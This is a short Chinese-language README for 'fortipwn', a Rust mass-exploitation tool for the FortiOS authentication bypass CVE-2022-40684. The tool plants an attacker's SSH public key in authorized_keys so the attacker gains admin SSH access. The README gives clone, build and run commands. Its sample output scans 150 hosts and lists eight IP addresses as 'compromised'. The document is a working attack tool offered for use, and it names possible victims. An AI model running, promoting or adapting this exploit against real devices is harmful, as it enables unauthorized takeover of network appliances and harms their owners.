基于Rust构建的Forti CVE-2022-40684枚举脚本。
将SSH公钥上传至authorized_keys,允许攻击者以admin身份通过SSH登录运行FortiOS的服务器。
$ ./fortipwn <hosts.txt> <id_rsa.pub>
$ git clone https://github.com/Grapphy/fortipwn/
$ cd fortipwn
$ cargo build --release
$ cd target/release/
$ ./fortipwn <host.txt> <id_rsa.pub>
$ ./fortipwn examples_ip.txt id_rsa.pub
正在检查150个主机。你可以通过SSH以admin@host身份登录已攻破的主机。
已攻破: 210.29.110.143
已攻破: 144.14.71.122
已攻破: 21.220.10.82
已攻破: 163.123.102.32
已攻破: 121.159.192.10
已攻破: 162.49.194.19
已攻破: 185.92.20.40
已攻破: 194.19.211.19
扫描完成